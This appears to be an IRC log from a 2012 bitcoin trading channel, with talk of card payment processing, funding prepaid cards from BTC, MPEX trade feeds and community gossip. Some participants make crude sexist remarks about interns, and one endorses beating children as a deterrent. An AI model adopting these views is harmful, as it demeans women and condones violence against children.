21:33:57 or a third party Oct 16 21:33:59 that connects to visa Oct 16 21:34:01 which is more likely Oct 16 21:34:13 direct connections to visa have volume limits Oct 16 21:34:23 *minimum volume limits Oct 16 21:34:30 of course. 3rd party would be a bank Oct 16 21:34:33 usually Oct 16 21:34:34 no Oct 16 21:34:35 not always Oct 16 21:34:41 there are companies who sell card readers Oct 16 21:34:47 card reader -> company -> visa Oct 16 21:34:52 well Oct 16 21:34:55 i have done my share of micro transafvtions and credit processing Oct 16 21:34:56 card reader -> company -> bank > visa Oct 16 21:35:01 me too Oct 16 21:35:03 10 years ago, still applies Oct 16 21:35:04 if you have a card reader and a client, that can connect to blockchain? Oct 16 21:35:06 i used to manage a convenience store Oct 16 21:35:12 5 years ago, still semi applies Oct 16 21:35:19 and we used to fight with credit all the time Oct 16 21:35:35 i was the one who discovered we were losing $100/mo Oct 16 21:35:41 we had a flat fee with AMEX Oct 16 21:35:48 so fi ONE person used amex to buy a $5 thing Oct 16 21:35:51 we'd get charged $100 Oct 16 21:35:56 fuck Oct 16 21:36:02 amex are very expesnive to use Oct 16 21:36:08 amex are great Oct 16 21:36:11 you just need the volume Oct 16 21:36:22 1 amex transaction a month hardly justified the fee Oct 16 21:36:22 ok used to be.. i dont recall rates, but it was about 3% while visa/mc was like 1.5% Oct 16 21:36:34 rates have all fluxed Oct 16 21:37:04 we only accepted visa/mc Oct 16 21:37:08 they had the best rates Oct 16 21:37:21 well to issue a debit card, you need to have a help from a bank. Oct 16 21:37:31 vampireb_: not necessarily Oct 16 21:37:44 ok how would go then? Oct 16 21:37:50 third party company Oct 16 21:37:51 id assume Oct 16 21:37:51 vampireb_: you can have reloadable cards issued to your business but it requires a KYC check Oct 16 21:38:00 KYC is fairly easy Oct 16 21:38:03 but not easy to do online Oct 16 21:38:15 vampireb_: but in terms of an OSS solution you would just use exsiting accounts Oct 16 21:38:17 if you were doing business IRL Oct 16 21:38:17 still requires a bank Oct 16 21:38:19 itd be a lot easier Oct 16 21:38:43 i have an amex prepaid card I liquidate btc to for buying lunch Oct 16 21:38:58 it's not seamless yet but with a few more tweaks it will be Oct 16 21:39:07 reverse charge? Oct 16 21:39:22 on the merchant end or my end? Oct 16 21:40:18 well i am recalling from memory that someone was funding cards this way Oct 16 21:41:32 [14:38] i have an amex prepaid card I liquidate btc to for buying lunch Oct 16 21:41:33 ehe Oct 16 21:41:35 so does MBS! Oct 16 21:41:40 MBS? Oct 16 21:41:43 yeah Oct 16 21:41:46 hes the gyu who buys me food online Oct 16 21:41:47 for btc Oct 16 21:41:50 hahaha Oct 16 21:41:55 i think nearly 80% of his cc transactions are me Oct 16 21:42:00 amex prepaid is like free Oct 16 21:42:03 no fees at all Oct 16 21:42:29 my division in TSYS (the cc processor I work for) processors rush card (the prepaid card by russell simmons for you def jam fans) and they have so many fees Oct 16 21:42:33 amex prepaid is a steal Oct 16 21:43:47 vampireb_: what i'm getting at is it takes a while to make the steps to liquidate into an account seamless, I want to make a solution anyone who wants to take the effort can set up on their own servers and spend cash with a prepaid card/debit card of their choosing Oct 16 21:45:20 i am not sure what "liquidate" means, still you would need a 3rd party to process the transactions. which will be out of reach for a lot of ppl. Oct 16 21:45:38 process which transactions? converting from exchange->fiat? Oct 16 21:46:10 fiat after exhcange -> card Oct 16 21:46:35 for prepaid cards that's as easy as having a bank account Oct 16 21:46:44 so I don't quite understand your question Oct 16 21:47:54 so BTC -> exchange -> user's bank account -> card ? Oct 16 21:48:08 yea traditional steps Oct 16 21:48:37 except in an automated batch processing world, each one of those "steps" is continuously happening each night to make it look like your doing btc -> card Oct 16 21:49:52 i'd prefer of course just the card is getting funded from BTC on demand :-) Oct 16 21:50:29 you have to go through an exchange though at some point to resupply your fiat on the card Oct 16 21:50:48 if you automate that process then it seems like it's on demand Oct 16 21:52:00 even credit cards aren't processed on demand, they are only auth'ed on demand, VISA/MasterCard sends a signal directly to the processor, the processor checks the available balances of the accounts and sends back an auth response accepted/declined. only at night are the accounts truly reconciled. for btc why would it be any different? Oct 16 21:52:57 (eCommerce auth is some of the most optimized software out there) Oct 16 21:54:30 that what I meant, only the required amount of BTC should be exchanged or locked during the auth Oct 16 21:55:03 you can make it perceived that way if you have pools in a warchest of sorts Oct 16 21:55:22 you have to hedge your holdings in order to overcome exchange fees so it's not traditional Oct 16 21:55:47 and you have* Oct 16 21:56:00 cause exchange rates are much higher than what visa charges processors Oct 16 21:59:06 [MPEX] [S.MPOE] 27800 @ 0.00041843 = 11.6324 BTC [+] Oct 16 22:00:32 You could also go www.btcpak.com -> Mp code -> Amex prepaid or Greendot Oct 16 22:00:43 for a good fee chunk Oct 16 22:21:29 < mircea_popescu> sorry. | I forgive you ;) Oct 16 22:24:06 thestringpuller: sounds like your idea is gaining some traction, eh? Oct 16 22:24:34 [MPEX] [S.MPOE] 1467 @ 0.00041843 = 0.6138 BTC [+] Oct 16 22:24:36 [MPEX] [S.MPOE] 19833 @ 0.00041858 = 8.3017 BTC [+] Oct 16 22:26:44 < mircea_popescu> smickles it has volume now ? | volume 232780 usd (which probably translates into 23278 contracts traded) open interest 7114 Oct 16 22:49:47 [MPEX] [S.MPOE] 5300 @ 0.00041805 = 2.2157 BTC [-] Oct 16 23:16:06 [MPEX] [S.MPOE] 1130 @ 0.000417 = 0.4712 BTC [-] Oct 16 23:41:52 [MPEX] [S.MPOE] 11797 @ 0.00041858 = 4.938 BTC [+] Oct 16 23:41:54 [MPEX] [S.MPOE] 15914 @ 0.0004189 = 6.6664 BTC [+] Oct 16 23:41:55 [MPEX] [S.MPOE] 11589 @ 0.00041913 = 4.8573 BTC [+] Oct 17 00:06:54 [MPEX] [S.MPOE] 28385 @ 0.0004172 = 11.8422 BTC [-] Oct 17 00:06:56 [MPEX] [S.MPOE] 5350 @ 0.00041606 = 2.2259 BTC [-] Oct 17 00:06:57 [MPEX] [S.MPOE] 10759 @ 0.00041576 = 4.4732 BTC [-] Oct 17 00:06:58 [MPEX] [S.MPOE] 2650 @ 0.00041466 = 1.0988 BTC [-] Oct 17 00:32:14 [MPEX] [S.MPOE] 25478 @ 0.0004151 = 10.5759 BTC [+] Oct 17 00:32:16 [MPEX] [S.MPOE] 12446 @ 0.00041466 = 5.1609 BTC [-] Oct 17 00:46:00 drekk sorry ? Oct 17 00:51:44 smickles i have my doubts, seeing that http://polimedia.us/dtng/c/res/17308.html Oct 17 00:52:00 that was the 2nd this month. Oct 17 00:57:44 [MPEX] [S.MPOE] 32900 @ 0.00041778 = 13.745 BTC [+] Oct 17 01:02:40 !ticker s.dice Oct 17 01:02:41 [MPEX:S.DICE] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.0001 / 0.00300231 / 0.0034 (2040952 shares, 6,127.58 BTC) Oct 17 01:08:12 [MPEX] [S.DICE] 1000 @ 0.00200001 = 2 BTC [-] Oct 17 01:08:14 [MPEX] [S.DICE] 100 @ 0.002 = 0.2 BTC [-] Oct 17 01:08:15 [MPEX] [S.DICE] 100 @ 0.00181053 = 0.1811 BTC [-] Oct 17 01:08:16 [MPEX] [S.DICE] 9474 @ 0.00181052 = 17.1529 BTC [-] Oct 17 01:08:16 [MPEX] [S.DICE] 100 @ 0.00181051 = 0.1811 BTC [-] Oct 17 01:08:18 [MPEX] [S.DICE] 3000 @ 0.0018105 = 5.4315 BTC [-] Oct 17 01:08:19 [MPEX] [S.DICE] 37 @ 0.00180001 = 0.0666 BTC [-] Oct 17 01:32:29 ukyo lol Oct 17 01:33:59 mircea_popescu: yeah, the gold and oil futures have near nil volume, but I was talking about the usd future Oct 17 01:34:08 o ? Oct 17 01:34:12 ? Oct 17 01:34:41 [MPEX] [S.MPOE] 15887 @ 0.00041466 = 6.5877 BTC [-] Oct 17 01:34:42 it was trading at about 10 earlier Oct 17 01:35:14 i was thinking there was a play like long the future, buy a put Oct 17 01:35:22 well im too lazy to dig up whatever acct details i made up whenever. Oct 17 01:35:41 who even came up with this idea of "have to log in" Oct 17 01:35:50 Ukto it was just funny typo is all Oct 17 01:36:13 smickles wait, trading at 10 ?! on what volume ? Oct 17 01:36:47 mircea_popescu: at such volume that i picked up about 200 below 11.4 Oct 17 01:37:09 that supposedly represents 2000 usd Oct 17 01:37:16 in magic theymos land Oct 17 01:37:25 what's theymos to do with anything !? Oct 17 01:37:34 he's a partner of icbit Oct 17 01:37:41 o lol Oct 17 01:37:41 has his fingers in everything Oct 17 01:37:50 THAT's why he was talking completely unwarranted shit about mpex ? Oct 17 01:38:00 could be Oct 17 01:38:05 fuckwit. what's he waiting for, me to give him free shares ? Oct 17 01:38:48 "let's find an exchange that isn't mpex or glbse" (meanwhile he part owns what is likely the runner up of those two) Oct 17 01:38:49 anyway. i was gonna say it's somewhat unlikely they actually have the means to pay if the price moves significantly, but maybe some btcs are worth the next generation of btctalk drama Oct 17 01:39:15 smickles no, it was "o, this thing i made SUCKS and it was badly managed and it's pure bulshit and a scam heaven" Oct 17 01:39:27 "we must find something other than that and this other thing which works" Oct 17 01:39:32 because... Oct 17 01:39:46 mircea_popescu: it's person to person contract sales with forced margin calls if the shit hits the fan, sound familiar? Oct 17 01:40:01 right-o. Oct 17 01:40:12 something they don't have the werewithal to pull off. Oct 17 01:40:37 anyway, i should hope he has learned his lesson on the forum. Oct 17 01:40:51 i guess if not he'll have plenty more opportunities in the future anyway. Oct 17 01:41:17 i understand he's younger than me, so he should have plenty of future Oct 17 01:42:02 anyway, i hought icbit is deepbit's. Oct 17 01:42:53 as far as i knew, deepbit and theymos were interchangable Oct 17 01:43:09 http://bitcoin.stackexchange.com/questions/4937/are-there-any-active-bitcoin-leveraged-trading-platforms-available/4938#4938 Oct 17 01:43:14 lol looky, rosenfeld too Oct 17 01:43:23 so this is going to be the next nexus of bitidiocy then ? Oct 17 01:45:32 [MPEX] [S.MPOE] 45000 @ 0.00041522 = 18.6849 BTC [+] Oct 17 01:45:33 [MPEX] [S.MPOE] 21844 @ 0.00041778 = 9.126 BTC [+] Oct 17 01:45:34 [MPEX] [S.MPOE] 3897 @ 0.00041913 = 1.6333 BTC [+] Oct 17 01:45:35 [MPEX] [S.MPOE] 20675 @ 0.00041926 = 8.6682 BTC [+] Oct 17 01:45:36 [MPEX] [S.MPOE] 108584 @ 0.00042 = 45.6053 BTC [+] Oct 17 01:47:32 lol, mircea_popescu, what's up with your /c crowd? they have a huge naruto cosplay thread capped off a pic of a couple dozen slave leias Oct 17 01:47:43 != Oct 17 01:47:44 i have no idea lol Oct 17 01:49:51 a btc entrepreneur working for a credit card processor. irony... Oct 17 01:50:06 who to the what now jurov ?! Oct 17 01:50:17 that rosenfeld question Oct 17 01:51:17 o Oct 17 01:51:30 mircea_popescu: you're like the bitcoin illuminati Oct 17 01:51:40 why me !? Oct 17 01:51:56 cause you are enigmatic Oct 17 01:52:16 how am i enigmatic ffs. i'm like... the only person in btc using their name, my mug is all over my blog Oct 17 01:52:16 your whole organization is enigmatic Oct 17 01:52:30 i'm about as enigmatic as captain fried chicken restaurant, what's his name Oct 17 01:52:51 colonel sanders? Oct 17 01:53:04 i think you're enigmatic for americans.. completely different culture Oct 17 01:53:15 ya that. Oct 17 01:53:23 jurov you know i lived there ? Oct 17 01:53:32 america sucks Oct 17 01:53:44 i can see why you left Oct 17 01:53:45 nowadays. it was merely started to suck back in the early prev decade Oct 17 01:53:59 and my mysterious organisation kept me well insulated from most of it anyway. Oct 17 01:54:15 see illuminati material Oct 17 01:54:27 i know you lived there, but seems you did not adapt very much Oct 17 01:54:35 not quite likr dead pirate roberts Oct 17 01:55:05 state financed capitalism is a terrible system Oct 17 01:55:13 inasmuch as it's simply socialism lol Oct 17 01:55:37 just with a different name Oct 17 01:56:06 yeah Oct 17 01:56:38 so youve been using the internet a long time mircea_popescu Oct 17 01:56:46 yes. Oct 17 01:56:52 you remind me of my hacking mentor Oct 17 01:56:58 haha ty. Oct 17 01:57:12 mircea_popescu used the internet when it was called compuserve Oct 17 01:57:12 telling stories of days of usenet past, when bbs ruled the modems Oct 17 01:57:31 lol compuserve Oct 17 01:57:39 im not bbs-old. Oct 17 01:57:55 is bitcoin really the last bastion against the eternal september? Oct 17 01:57:55 but i did use it at a time when naked girls made out of letters counted as porn Oct 17 01:58:05 thestringpuller in parts, for sure. Oct 17 01:58:38 i know some linux usegroups are still intelligent Oct 17 01:58:55 but it is sad to see ignorance running rampant like a disease Oct 17 01:59:26 bitcoin is made up roughly by thirds : one third is very intelligent but softspoken and a little aspie tech people ; one third is unabashed scammers ; one third is purest form of idiot Oct 17 01:59:35 a year ago the first was more like 40-50%. Oct 17 01:59:39 two years ago it was over 2/3 Oct 17 02:00:44 the first 1/3 will end up controlling the bitcoin world when the other 2/3 annihilate each other Oct 17 02:01:43 not rly. Oct 17 02:01:48 i see thestringpuller is an optimist Oct 17 02:02:26 finance people will control the bitcoin world. they are moving in but very slowly (mostly because they have trouble distinguishing A and C, and despise B) Oct 17 02:04:39 bah imsaguy2 should get BAK so that he can sign the s²cm report Oct 17 02:05:08 *is in Oct 17 02:05:09 believes Oct 17 02:05:28 ah, i haz typing skilz Oct 17 02:06:14 this is the problem, the way my desk faces, he is behind me Oct 17 02:06:27 he basically sneaks around my back, day and night Oct 17 02:06:41 lol Oct 17 02:06:50 you two live together ?! Oct 17 02:07:26 well, in the sense that we live on the same land mass Oct 17 02:07:34 :p Oct 17 02:07:40 i think he's about 2000 miles away Oct 17 02:08:31 i am kind of an optimist Oct 17 02:08:34 lol Oct 17 02:09:35 actually, this could be a kickass research paper. all the social groups meeting around btc have serious trouble distinguishing the others. Oct 17 02:09:44 scammers don't well distinguish the tech from the idiots Oct 17 02:09:54 tech people don't well distinguish the finance ppl from the scammers Oct 17 02:10:03 idiots distinguish pretty much nobody Oct 17 02:10:27 but famously not finance and scammer types Oct 17 02:10:52 [MPEX] [S.MPOE] 26887 @ 0.00042 = 11.2925 BTC [+] Oct 17 02:11:16 some scams are very elaborate Oct 17 02:11:20 like bfl Oct 17 02:11:44 that's possibly a scam, yet. Oct 17 02:12:19 it's run by a felon. no good can come of it Oct 17 02:12:46 yea that part is problematic. Oct 17 02:12:48 [MPEX] [S.MPOE] 2706298 @ 0.00042 = 1136.6452 BTC [+] Oct 17 02:12:49 [MPEX] [S.MPOE] 28618 @ 0.00042015 = 12.0239 BTC [+] Oct 17 02:12:51 [MPEX] [S.MPOE] 8528 @ 0.00042042 = 3.5853 BTC [+] Oct 17 02:12:52 [MPEX] [S.MPOE] 3300 @ 0.00042061 = 1.388 BTC [+] Oct 17 02:12:52 [MPEX] [S.MPOE] 40700 @ 0.00042076 = 17.1249 BTC [+] Oct 17 02:12:53 [MPEX] [S.MPOE] 4200 @ 0.00042085 = 1.7676 BTC [+] Oct 17 02:12:54 [MPEX] [S.MPOE] 904 @ 0.00042122 = 0.3808 BTC [+] Oct 17 02:12:56 [MPEX] [S.MPOE] 28300 @ 0.00042144 = 11.9268 BTC [+] Oct 17 02:12:57 [MPEX] [S.MPOE] 15100 @ 0.0004218 = 6.3692 BTC [+] Oct 17 02:12:58 [MPEX] [S.MPOE] 11000 @ 0.00042206 = 4.6427 BTC [+] Oct 17 02:12:59 [MPEX] [S.MPOE] 33300 @ 0.00042244 = 14.0673 BTC [+] Oct 17 02:13:00 [MPEX] [S.MPOE] 27000 @ 0.00042267 = 11.4121 BTC [+] Oct 17 02:13:01 [MPEX] [S.MPOE] 58900 @ 0.00042268 = 24.8959 BTC [+] Oct 17 02:13:01 [MPEX] [S.MPOE] 5400 @ 0.00042356 = 2.2872 BTC [+] Oct 17 02:13:02 [MPEX] [S.MPOE] 28452 @ 0.00042375 = 12.0565 BTC [+] Oct 17 02:13:11 whoa Oct 17 02:13:16 huge buy Oct 17 02:14:13 like 3mn Oct 17 02:14:20 ppl've been lapping it up past few days Oct 17 02:16:04 ;;ticker Oct 17 02:16:05 Best bid: 11.80902, Best ask: 11.8199, Bid-ask spread: 0.01088, Last trade: 11.82, 24 hour volume: 41258, 24 hour low: 11.5, 24 hour high: 11.99 Oct 17 02:19:26 Nah, probably just a single market maker Oct 17 02:20:09 Moving prices around to profit extra Oct 17 02:21:49 just got an idea, should go make mtgoxlive-style interface for mpex Oct 17 02:21:58 do it Oct 17 02:22:06 so that there will be lively wall-watching discussions Oct 17 02:23:03 [MPEX] [S.MPOE] 8848 @ 0.00042375 = 3.7493 BTC [+] Oct 17 02:23:05 [MPEX] [S.MPOE] 43900 @ 0.00042388 = 18.6083 BTC [+] Oct 17 02:23:06 [MPEX] [S.MPOE] 2252 @ 0.00042393 = 0.9547 BTC [+] Oct 17 02:23:07 might be kinda cool Oct 17 02:23:26 if it were on fire Oct 17 02:25:05 yea, and with lemmings Oct 17 02:27:30 but i suck at js... will prolly hire someone Oct 17 02:28:40 use C Oct 17 02:28:47 real men write C Oct 17 02:29:31 derefernce all the pointers Oct 17 02:29:42 dereference* Oct 17 02:30:12 real men dereference the pointers in the order they created them. Oct 17 02:30:42 real mean use strict aliasing Oct 17 02:31:42 i hate ivy Oct 17 02:31:52 i hate java Oct 17 02:31:55 whyyyy Oct 17 02:34:34 mircea, when thinking about the three groups of bitcoiners, do you realize MPOE-PR repulses not just the idiots, but also many aspies as well? Oct 17 02:35:09 i have seen jgarzik himself complaining about her Oct 17 02:36:22 anyone here interested in the s²cm financial report? Oct 17 02:36:23 https://bitcointalk.org/index.php?topic=74216.msg1277243#msg1277243 Oct 17 02:37:07 jeff garzik the kernel dev? Oct 17 02:37:12 that guy is badass Oct 17 02:37:31 yes. he was prolly referring to this thread: https://bitcointalk.org/index.php?topic=118679.msg1276480#msg1276480 Oct 17 02:39:30 and sorry smickles, i pulled out of SS and glbse as whole day before it was closed Oct 17 02:40:25 jurov yes. Oct 17 02:42:01 lol "his answers" Oct 17 02:42:18 i'm sure the tech people will at some point get over their inertia, do their research etc. Oct 17 02:43:09 looks like jeff didn't like mpoe-pr's "trolling" on the forums Oct 17 02:45:28 jurov: heh, no need to be sorry. There's a lot of uncertanty out there Oct 17 02:47:04 the response to coinbr announcement was very poor so far. and i feel mpoe-pr isn't exactly helping. Oct 17 02:47:33 in "poor" i don't mean comments but actual new accounts Oct 17 02:48:02 you may have to market Oct 17 02:48:16 jurov have you done advertising or anything ? Oct 17 02:48:41 [MPEX] [S.MPOE] 47400 @ 0.00041834 = 19.8293 BTC [-] Oct 17 02:48:50 i recall kakobrekla complaining about poor smpake uptake a few weeks ago too, for that matter. i doubt it has anything to do with the girl. Oct 17 02:49:14 see mircea_popescu "the girl" Oct 17 02:49:20 engimatic organization Oct 17 02:49:27 enigmatic* Oct 17 02:49:31 mpoe-pr! Oct 17 02:49:50 aka 'the girl' Oct 17 02:49:57 any ideas where it's good to market? at first i have tried to find any doscussions about mpex Oct 17 02:49:58 like a codename Oct 17 02:50:03 *discussions Oct 17 02:50:09 jurov well i can tell you forum advertising has a horrible roi Oct 17 02:50:22 reddit Oct 17 02:50:28 try reddi... oh Oct 17 02:50:29 but it turned out there isn't anything much outside btctalk Oct 17 02:50:35 it's possible a good idea to snipe people who complain about how "difficult" or w./e mpex is, Oct 17 02:50:41 but in my experience their complaints are fake Oct 17 02:50:54 (as in, excuses as to why they either don't have the money or the interest to trade, not causes) Oct 17 02:51:11 im not doing anything on reddit, so that might be a good spot. Oct 17 02:51:24 tho iirc it's mostly btc-hostile (apart from btc people trying to keep a foothold) Oct 17 02:51:27 no, i never planned that. just add it to relevant topics Oct 17 02:51:30 jurov : you might try SA forums. Oct 17 02:52:09 http://forums.somethingawful.com/showthread.php?threadid=3413928&userid=0&perpage=40&pagenumber=166 << there's a good thread :D Oct 17 02:52:10 or EVE Online Oct 17 02:52:33 lol eve Oct 17 02:52:44 list an eve company on mpex Oct 17 02:53:40 sure why not Oct 17 02:54:22 would you be open to that mircea_popescu? Oct 17 02:54:44 thestringpuller if it can show a btc revenue source Oct 17 02:56:37 im not doing anything on reddit, so that might be a good spot... loool you forgot what i wrote yesterday? reddit reception was much worse than btctalk Oct 17 02:57:02 jurov so therefore the girl is actually helping you lol Oct 17 02:57:18 lol illuminati Oct 17 02:57:49 no, just, random idiot is a little less prone to start running his mouth for fear she might "troll him" Oct 17 02:58:03 when you control the btc market mircea_popescu give me one whitehouse intern Oct 17 02:58:11 lol Oct 17 02:58:20 why not get your own ? they're not that hard you know. Oct 17 03:01:55 i should just hire cute interns Oct 17 03:02:04 offer them a share of mah dick Oct 17 03:04:07 w000t google has free charts api... no messing with js Oct 17 03:15:08 [MPEX] [S.MPOE] 22819 @ 0.00042006 = 9.5853 BTC [+] Oct 17 03:28:15 http://trilema.com/2012/bitcoin-is-creating-a-whole-new-set-of-problems/ if anyone's curious. Oct 17 03:29:05 who was doxed Oct 17 03:29:54 no one? Oct 17 03:30:36 kakobrekla i dunno, some -otc kid Oct 17 03:30:53 didn't care enough to ask. Oct 17 03:31:02 oh you. Oct 17 04:05:48 [MPEX] [S.MPOE] 36700 @ 0.00042115 = 15.4562 BTC [+] Oct 17 04:05:50 [MPEX] [S.MPOE] 8700 @ 0.0004213 = 3.6653 BTC [+] Oct 17 04:31:08 [MPEX] [S.MPOE] 4273 @ 0.0004176 = 1.7844 BTC [-] Oct 17 04:31:10 [MPEX] [S.MPOE] 10027 @ 0.0004175 = 4.1863 BTC [-] Oct 17 04:58:05 [MPEX] [S.MPOE] 12900 @ 0.00041778 = 5.3894 BTC [+] Oct 17 05:24:48 [MPEX] [S.MPOE] 3000 @ 0.00042127 = 1.2638 BTC [+] Oct 17 05:42:45 this channel became silent Oct 17 05:43:24 this channel became unsilent Oct 17 05:43:41 Yay Oct 17 05:43:43 lol Oct 17 05:50:45 [MPEX] [S.MPOE] 853 @ 0.00041824 = 0.3568 BTC [-] Oct 17 05:50:45 [MPEX] [S.MPOE] 8500 @ 0.00041817 = 3.5544 BTC [-] Oct 17 05:53:36 that was a good mental image Azelphur Oct 17 05:53:45 thestringpuller: :D Oct 17 06:05:19 smickles what's the difference between cosplay and dressing as slave leila anyway ?! Oct 17 06:06:10 you obviously don't know the way of the neckbeards Oct 17 06:06:38 http://youtu.be/ZZ5LpwO-An4 Oct 17 06:06:41 mircea_popescu: there are 19 year olds who think they know philosophy better than the creators? Oct 17 06:06:49 (referring to blog post I just skimmed) Oct 17 06:06:52 actually those who think so are moslty 19 Oct 17 06:06:58 i'm 19 Oct 17 06:07:07 you're not 19 Oct 17 06:07:09 you are offending me Oct 17 06:07:37 ok i'm almost 19 Oct 17 06:07:45 meh when I was 19 I learned what "know thyself" truly meant, in conjunction with to truly learn you must admit you know nothing and always seek answers Oct 17 06:07:59 yawell. Oct 17 06:08:03 kids just think they're invincible? or are pampered? Oct 17 06:08:04 yeah ilearned that too Oct 17 06:08:19 i'm a member of certain masonic and fraternal organizations Oct 17 06:08:27 they teach you that you know nothing thing Oct 17 06:08:33 birth to death, blah Oct 17 06:08:38 thestringpuller self esteem and all sorts of retardedness, like no more at home beatings. Oct 17 06:09:53 is this the official channel of all things bitcoin divisible as an asset Oct 17 06:10:06 http://www.youtube.com/watch?v=o8Gr3LPzwMw Oct 17 06:10:09 mircea_popescu I don't know if you've seen Chappelle's Show, but there is this episode where this "white family" gives timeout to this hoodlum kid for "mouthing off". So he goes up to his room picks up a dirty mag and says, "timeout rules" Oct 17 06:10:22 lol Oct 17 06:10:37 so I guess you're right Oct 17 06:10:52 [MPEX] [S.MPOE] 22349 @ 0.00041792 = 9.3401 BTC [-] Oct 17 06:10:54 [MPEX] [S.MPOE] 25500 @ 0.00041989 = 10.7072 BTC [+] Oct 17 06:10:55 [MPEX] [S.MPOE] 34600 @ 0.0004213 = 14.577 BTC [+] Oct 17 06:10:56 [MPEX] [S.MPOE] 33400 @ 0.00042154 = 14.0794 BTC [+] Oct 17 06:10:57 [MPEX] [S.MPOE] 7000 @ 0.00042393 = 2.9675 BTC [+] Oct 17 06:10:57 I was never beaten as a kid, but I learned to respect mah folks. Oct 17 06:10:58 [MPEX] [S.MPOE] 2151 @ 0.00042425 = 0.9126 BTC [+] Oct 17 06:11:09 beatings are like nuclear weapons Oct 17 06:11:16 kids must know they're fully available and will be used. Oct 17 06:11:19 then they're not really needed. Oct 17 06:11:29 mircea_popescu: nothing, but that thread was all _naruto_ cosplay until the leia cosplay Oct 17 06:11:38 Lol Oct 17 06:11:42 omg cosplay takeover ? Oct 17 06:11:43 and it was a massive amount of naruto cosplay Oct 17 06:11:45 wtf is naruto Oct 17 06:11:58 anime? Oct 17 06:12:01 usagi would know Oct 17 06:12:02 and leila ? Oct 17 06:12:03 XD Oct 17 06:12:09 leia = star wars Oct 17 06:12:15 o wow?! Oct 17 06:12:21 i thought star wars is scifi Oct 17 06:12:32 lol Oct 17 06:14:07 you don't look that old mircea_popescu Oct 17 06:14:24 how old is that old ? Oct 17 06:19:41 I work with a guy who upgraded his computer to run doom Oct 17 06:20:01 my first pc was a 286 Oct 17 06:20:09 you're not that old =P Oct 17 06:20:14 you're silver age Oct 17 06:20:18 before that i had a bunch of z80 clones Oct 17 06:20:30 old would be kids who programmed on the altair 8800 Oct 17 06:20:39 thestringpuller http://trilema.com/2012/chaos-battle-of-the-wizards/ Oct 17 06:20:42 ever played that ? Oct 17 06:21:18 that looks awesome, but unfortunately no I haven't Oct 17 06:21:56 noob :D Oct 17 06:22:02 :( Oct 17 06:22:08 But I'm going to play it now Oct 17 06:22:12 it's never too late to play classics Oct 17 06:23:03 bitcoin: ageism Oct 17 06:37:04 [MPEX] [S.MPOE] 31200 @ 0.00042233 = 13.1767 BTC [-] Oct 17 06:39:53 mircea_popescu: you don't look a day over 35 Oct 17 06:40:02 or 30 Oct 17 06:40:20 to be honest from the picture on your blog I would think you were in your 20's Oct 17 06:52:56 in that pic i was. Oct 17 07:02:34 [MPEX] [S.MPOE] 39973 @ 0.0004175 = 16.6887 BTC [-] Oct 17 07:02:35 [MPEX] [S.MPOE] 1527 @ 0.00041748 = 0.6375 BTC [-] Oct 17 07:16:41 http://images.wikia.com/uncyclopedia/images/a/a9/He-Man.gif Oct 17 07:28:39 [MPEX] [S.MPOE] 17000 @ 0.00041835 = 7.112 BTC [+] Oct 17 07:34:02 mircea_popescu: the old man Oct 17 07:34:15 That's your illuminati name "the old man" Oct 17 07:42:38 thestringpuller: http://encyclopediabitcoinica.com/wiki/Mircea_Popescu for the latest pic of mircea_popescu Oct 17 07:43:04 http://www.encyclopediabitcoinica.com/wiki/Mircea_Popescu Oct 17 07:43:17 i think i spelled it wrong the first time Oct 17 07:51:10 wow Oct 17 07:54:51 [MPEX] [S.MPOE] 20400 @ 0.00041793 = 8.5258 BTC [-] Oct 17 07:54:53 [MPEX] [S.MPOE] 10700 @ 0.00041748 = 4.467 BTC [-] Oct 17 08:00:59 [MPEX] [O.BTCUSD.C120T] 100 @ 0.0629201 = 6.292 BTC [-] Oct 17 08:25:49 heh Oct 17 08:26:35 [MPEX] [S.MPOE] 1562 @ 0.00041835 = 0.6535 BTC [+] Oct 17 08:26:36 [MPEX] [S.MPOE] 4100 @ 0.00041937 = 1.7194 BTC [+] Oct 17 08:52:10 [MPEX] [S.MPOE] 9400 @ 0.00042015 = 3.9494 BTC [+] Oct 17 09:17:30 [MPEX] [S.MPOE] 16330 @ 0.00042015 = 6.861 BTC [+] Oct 17 09:17:31 [MPEX] [S.MPOE] 25773 @ 0.00041748 = 10.7597 BTC [-] Oct 17 09:17:33 [MPEX] [S.MPOE] 4347 @ 0.00041745 = 1.8147 BTC [-] Oct 17 09:42:45 [MPEX] [S.MPOE] 48012 @ 0.00042051 = 20.1895 BTC [+] Oct 17 10:09:09 [MPEX] [S.MPOE] 6190 @ 0.00042051 = 2.603 BTC [+] Oct 17 10:09:11 [MPEX] [S.MPOE] 44853 @ 0.00041745 = 18.7239 BTC [-] Oct 17 10:09:12 [MPEX] [S.MPOE] 457 @ 0.0004174 = 0.1908 BTC [-] **** ENDING LOGGING AT Wed Oct 17 10:44:40 2012 **** BEGIN LOGGING AT Wed Oct 17 10:45:06 2012 Oct 17 11:00:00 [MPEX] [S.MPOE] 26800 @ 0.00042087 = 11.2793 BTC [+] Oct 17 11:25:19 [MPEX] [S.MPOE] 9700 @ 0.00041867 = 4.0611 BTC [-] Oct 17 11:25:20 [MPEX] [S.MPOE] 3343 @ 0.0004174 = 1.3954 BTC [-] Oct 17 11:51:12 [MPEX] [S.MPOE] 13800 @ 0.0004171 = 5.756 BTC [-] Oct 17 11:51:13 [MPEX] [S.MPOE] 21200 @ 0.0004167 = 8.834 BTC [-] Oct 17 11:51:15 [MPEX] [S.MPOE] 7100 @ 0.00041639 = 2.9564 BTC [-] Oct 17 11:51:16 [MPEX] [S.MPOE] 6300 @ 0.00041597 = 2.6206 BTC [-] Oct 17 12:16:47 [MPEX] [S.MPOE] 23200 @ 0.00041597 = 9.6505 BTC [-] Oct 17 12:16:48 [MPEX] [S.MPOE] 1600 @ 0.00041591 = 0.6655 BTC [-] Oct 17 12:42:28 [MPEX] [S.MPOE] 30500 @ 0.00041591 = 12.6853 BTC [-] Oct 17 13:07:41 [MPEX] [S.MPOE] 9100 @ 0.00041591 = 3.7848 BTC [-] Oct 17 13:07:42 [MPEX] [S.MPOE] 17088 @ 0.00041582 = 7.1055 BTC [-] Oct 17 13:28:53 http://eprint.iacr.org/2012/584.pdf Oct 17 13:35:35 [MPEX] [S.MPOE] 10980 @ 0.00041605 = 4.5682 BTC [+] Oct 17 13:35:35 [MPEX] [S.MPOE] 26500 @ 0.00041646 = 11.0362 BTC [+] Oct 17 13:35:37 [MPEX] [S.MPOE] 11020 @ 0.00041737 = 4.5994 BTC [+] Oct 17 14:00:27 thanks kakobrekla, this has some really interesting information. Oct 17 14:00:49 [MPEX] [S.MPOE] 21637 @ 0.00041737 = 9.0306 BTC 